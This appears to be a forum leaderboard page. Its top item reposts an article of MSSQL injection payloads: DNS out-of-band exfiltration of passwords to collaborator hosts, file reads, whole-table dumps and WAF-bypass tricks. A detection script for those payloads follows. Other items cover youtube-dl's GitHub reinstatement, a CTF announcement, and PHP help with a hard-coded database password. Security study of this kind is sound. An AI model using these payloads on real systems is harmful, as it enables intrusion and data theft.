
Leaderboard

Popular Content

Showing content with the highest reputation on 11/18/20 in all areas

  1. Advanced MSSQL Injection Tricks
Written by PT SWARM Team (ptswarm) on November 12, 2020

We compiled a list of several techniques for improved exploitation of MSSQL injections. All the vectors have been tested on at least three of the latest versions of Microsoft SQL Server: 2019, 2017, 2016SP2.

DNS Out-of-Band

If confronted with a fully blind SQL injection with disabled stacked queries, it's possible to attain DNS out-of-band (OOB) data exfiltration via the functions fn_xe_file_target_read_file, fn_get_audit_file, and fn_trace_gettable.

fn_xe_file_target_read_file() example:
https://vuln.app/getItem?id=1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))
Permissions: Requires VIEW SERVER STATE permission on the server.

fn_get_audit_file() example:
https://vuln.app/getItem?id=1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))
Permissions: Requires the CONTROL SERVER permission.

fn_trace_gettable() example:
https://vuln.app/getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))
Permissions: Requires the CONTROL SERVER permission.

Alternative Error-Based vectors

Error-based SQL injections typically resemble constructions such as «+AND+1=@@version--» and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data.

Some examples of such functions: SUSER_NAME(), USER_NAME(), PERMISSIONS(), DB_NAME(), FILE_NAME(), TYPE_NAME(), COL_NAME()

Example use of function USER_NAME():
https://vuln.app/getItem?id=1'%2buser_name(@@version)--

Quick exploitation: Retrieve an entire table in one query

There exist two simple ways to retrieve the entire contents of a table in one query — the use of the FOR XML or the FOR JSON clause. The FOR XML clause requires a specified mode such as «raw», so in terms of brevity FOR JSON outperforms it.

The query to retrieve the schema, tables and columns from the current database:
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--

Error-based vectors need an alias or a name, since the output of expressions without either cannot be formatted as JSON.
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--

Reading local files

An example of retrieving a local file C:\Windows\win.ini using the function OpenRowset():
https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x)),null,null

Error-based vector:
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
Permissions: The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.

Retrieving the current query

The current SQL query being executed can be retrieved from sys.dm_exec_requests and sys.dm_exec_sql_text:
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
Permissions: If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session.

Little tricks for WAF bypasses

Non-standard whitespace characters: %C2%85 or %C2%A0:
https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--

Scientific (0e) and hex (0x) notation for obfuscating UNION:
https://vuln.app/getItem?id=0eunion+select+null,@@version,null--
https://vuln.app/getItem?id=0xunion+select+null,@@version,null--

A period instead of a whitespace between FROM and a column name:
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--

\N separator between SELECT and a throwaway column:
https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--

Source: https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/
    1 point
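A defender-side example, added here and not part of the PT SWARM article or of the forum post: a small request scanner that canonicalizes the WAF-bypass variants listed above (NEL/NBSP whitespace, 0e/0x prefixes, `from.`, `\N`) before applying plain keyword rules, so a UNION or one of the OOB/file-read functions is visible in a log line no matter how it was dressed up. The request URLs are constructed from the article's payload shapes, and the names normalize, classify and scan_url are the example's own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Non-standard whitespace the article shows slipping past WAFs: U+0085 (NEL) and U+00A0 (NBSP).
ODD_SPACE = {"\u0085", "\u00a0"}
# Functions the article uses for DNS out-of-band, local-file reads and error-based leaks.
SUSPICIOUS_FUNCS = ("fn_xe_file_target_read_file", "fn_get_audit_file", "fn_trace_gettable",
                    "openrowset", "dm_exec_sql_text", "user_name(", "suser_name(")
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")
FOR_CLAUSE = re.compile(r"\bfor\s+(?:json|xml)\b")

def normalize(value: str) -> str:
    """Canonicalize an already URL-decoded parameter value so plain keyword
    rules see through the obfuscations the article lists."""
    text = value.lower()
    text = "".join(" " if ch in ODD_SPACE else ch for ch in text)  # NEL/NBSP -> space
    text = re.sub(r"(?<![a-z0-9_])0[ex](?=union\b)", "0 ", text)   # 0eunion / 0xunion
    text = text.replace("from.", "from ")                            # from.users
    text = text.replace("\\n", " ")                                  # select\Nnull
    return re.sub(r"\s+", " ", text).strip()

def classify(value: str) -> list[str]:
    """Findings for one decoded parameter value; an empty list means nothing matched."""
    norm = normalize(value)
    findings = []
    if UNION_SELECT.search(norm):
        findings.append("union-select")
    if FOR_CLAUSE.search(norm):
        findings.append("for-json/xml")
    findings += [f"func:{fn.rstrip('(')}" for fn in SUSPICIOUS_FUNCS if fn in norm]
    return findings

def scan_url(url: str) -> dict[str, list[str]]:
    """Map each query parameter with findings to its findings (parse_qsl does the decoding)."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return {name: hits for name, value in pairs if (hits := classify(value))}

# Constructed requests: one benign, then the bypass variants and the OpenRowset read from the article.
SAMPLES = [
    "https://vuln.app/getItem?id=42",
    "https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--",
    "https://vuln.app/getItem?id=0xunion+select\\Nnull,@@version,null+from+users--",
    "https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--",
    "https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+'C:\\Windows\\win.ini',SINGLE_CLOB)+R(x)),null,null",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(scan_url(url) or "clean", "<-", url)
```

Run it over a web-server access log by feeding each request path to scan_url; the normalization step is the part worth porting into whatever rule engine sits in front of the application.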
  2. GitHub Reinstates Youtube-DL and Puts $1M in Takedown Defense Fund
November 16, 2020 by Ernesto Van der Sar

GitHub has reinstated the youtube-dl repository after it concluded that the code doesn't violate the DMCA's anti-circumvention provisions. The company believes that developers should have the freedom to tinker, whether the RIAA likes it or not, and has placed $1 million into a takedown defense fund.

Last month, the RIAA pulled the popular open source tool youtube-mp3 from GitHub. The music group sent a takedown notice arguing that the software violated section 1201 of the DMCA, which prevents people from bypassing technical protection measures.

This enforcement action wasn't well-received by the developer community. This included GitHub CEO Nat Friedman, who was 'annoyed' and personally offered his help to get the repository reinstated. This wasn't a false promise, as youtube-dl returned today.

GitHub Reinstates Youtube-dl

"We are taking a stand for developers and have reinstated the youtube-dl repo. Section 1201 of the DMCA is broken and needs to be fixed. Developers should have the freedom to tinker. That's how you get great tools like youtube-dl," Friedman says.

GitHub has reinstated the repository after some changes were made. These changes include referrals to copyrighted music, which RIAA pointed out in its claim. However, the software still allows people to download files, including music tracks, from YouTube.

After a careful look at the "circumvention" allegations, GitHub now concludes that they are not valid. The company explains that it "received additional information" that allowed it "to reverse" the takedown.

No DMCA Anti-Circumvention Violations

"[O]ur reinstatement, based on new information that showed the project was not circumventing a technical protection measure (TPM), was in line with our values of putting developers first," GitHub notes.

This new information comes from the Electronic Frontier Foundation (EFF), which responded to the RIAA's takedown request on behalf of the youtube-dl developers. The EFF's letter explains in detail how the software works and stresses that there is no advanced decryption involved, as we highlighted earlier.

"Youtube-dl stands in place of a Web browser and performs a similar function with respect to user-uploaded videos. Importantly, youtube-dl does not decrypt video streams that are encrypted with commercial DRM technologies, such as Widevine, that are used by subscription video sites, such as Netflix," the letter reads.

The letter helped to convince GitHub that it wrongly granted the takedown request. And since other copyright issues pointed out by the RIAA were addressed as well, the company decided to reinstate the repository.

Developers First

In addition, the revolt from the developer community was a clear reminder that developers should come first. As such, GitHub also announced that it will overhaul the way it handles DMCA section 1201 claims.

One key change is that content won't always be removed right away. This change doesn't apply to regular DMCA takedown notices but to 'circumvention' claims specifically. From now on, these will all be manually reviewed and scrutinized by experts.

"When we see it is possible to modify a project to remove allegedly infringing content, we give the owners a chance to fix problems before we take content down. If not, they can always respond to the notification disabling the repository and offer to make changes, or file a counter notice," GitHub explains.

$1M in Defense Fund

The developer platform will aid developers financially as well. The company announced that it will put $1 million into a defense fund to help open source developers on GitHub protect themselves from overbroad or unwarranted DMCA Section 1201 takedown requests.

In addition, it will also get more involved in the political side of things. Every three years the US Copyright Office reviews its DMCA anti-circumvention exceptions and GitHub will have its voice heard there as well.

"We are also advocating specifically on the anti-circumvention provisions of the DMCA to promote developers' freedom to build socially beneficial tools like youtube-dl," the company notes.

All in all, it's safe to say that the RIAA's takedown attempt has completely backfired. We previously reached out to the music group for comment on related youtube-dl issues, but this request remains unanswered.

The RIAA continues to issue similar DMCA circumvention requests to other companies, including Google. These argue that YouTube rippers violate the DMCA as they bypass YouTube's "rolling cipher." At GitHub, those won't work anymore.

Youtube-dl Devs Are Happy

Sergey, one of the youtube-dl developers, tells us that he is happy with all the support they have received from the EFF, GitHub, as well as the public at large.

"EFF's help was invaluable. We'd like to thank EFF and Mitch Stoltz personally for their incredible support and dedication. We'd also like to thank GitHub for standing up for youtube-dl and taking potential legal risks by allowing youtube-dl to keep the rolling cipher code," he says.

"We're also grateful to all the tremendous amount of support and offers received lately (we physically were not able to respond to everyone) and all youtube-dl users," Sergey adds.

Source: https://torrentfreak.com/github-reinstates-youtube-dl-and-puts-1m-in-takedown-defense-fund-201116/?fbclid=IwAR0a6KNjcUtqxmGcq3wby9rV9sxoDHnwgSB83P17UhQ2fOgrPT1mFXVabnI
    1 point
  3. 20 November 2020, 10:00 - 18:00. Contest prizes: 1st place - 3000 RON; 2nd place - 2000 RON; 3rd place - 1000 RON; Best write-up - 500 RON. The prizes are funded by donations from community members: Nytro, malsploit, Dragos, dancezar, Matasareanu. We are going through a difficult period and our suggestion is that the prizes be donated, if possible. For discussions about the CTF we will use the #ctf channel on Slack. The contest results will be presented at 18:00. Full details: https://ctf.rstcon.com/
    1 point
  4. From the very beginning the takedown was nonsense; someone at the RIAA got bored of Among Us during quarantine and decided to do something with their life that day. It's interesting that the EFF took their side and that GitHub decided to set aside $1M in its budget for situations like this in the future.
    1 point
  5. There are many ways to optimize the code I posted. The script was written in a hurry and tested only on a small batch of elements.
    1 point
  6. Recommended. Works quickly and efficiently.
    1 point
  7. If you want to keep going with the structure you currently have, you can use a regex to extract the data and then work with it, for example:

    <?php
    $mysql = mysqli_connect("localhost", "ips", "8hLXKFoFBuLld9LW", "tests") or die("connection failure");
    $q = $mysql->query("select val from ips");
    $ips = array();
    while ($v = $q->fetch_row()) {
        // extract the IP, time and date from the MySQL row with a regex
        if (!preg_match('/((?:[0-9]{1,3}\.){3}[0-9]{1,3}) ([0-2]?[0-9]:[0-5]?[0-9]:[0-5]?[0-9]) ([0-2]?[0-9]\/[0-5]?[0-9]\/[0-9][0-9][0-9][0-9])/', $v[0], $matches)) {
            continue; // skip rows that do not have the expected "IP time date" layout
        }
        // echo $matches[1]; // IP
        // echo $matches[2]; // time
        // echo $matches[3]; // date
        $ips[] = $matches[1]; // push the IP from the MySQL row into the IPs array
    }
    print_r(array_count_values($ips)); // print how many times each IP appears

With the following values in the database:

    127.0.0.1 13:29:05 13/08/2020
    123.123.123.123 13:29:05 13/08/2020
    127.0.0.1 13:29:05 13/08/2020

the script returns:

    Array ( [127.0.0.1] => 2 [123.123.123.123] => 1 )
    1 point
  8. Search the web for "php mysql select" and run the query: SELECT ip, COUNT(*) AS cnt FROM table_name GROUP BY ip and you will get the unique list of IPs and the number of repetitions for each. EDIT: I now see that you said you have all the information in the same column. Instead of ip you can use SUBSTRING_INDEX(nume_coloana, " ", 1) if you are sure that you always have an IP, that it is at position 1 (up to the first space) and that it contains no spaces (i.e., exactly like in your example).
    1 point
  9. I think you realize that nobody is going to risk giving you an invite when you made an account just to post here.
    1 point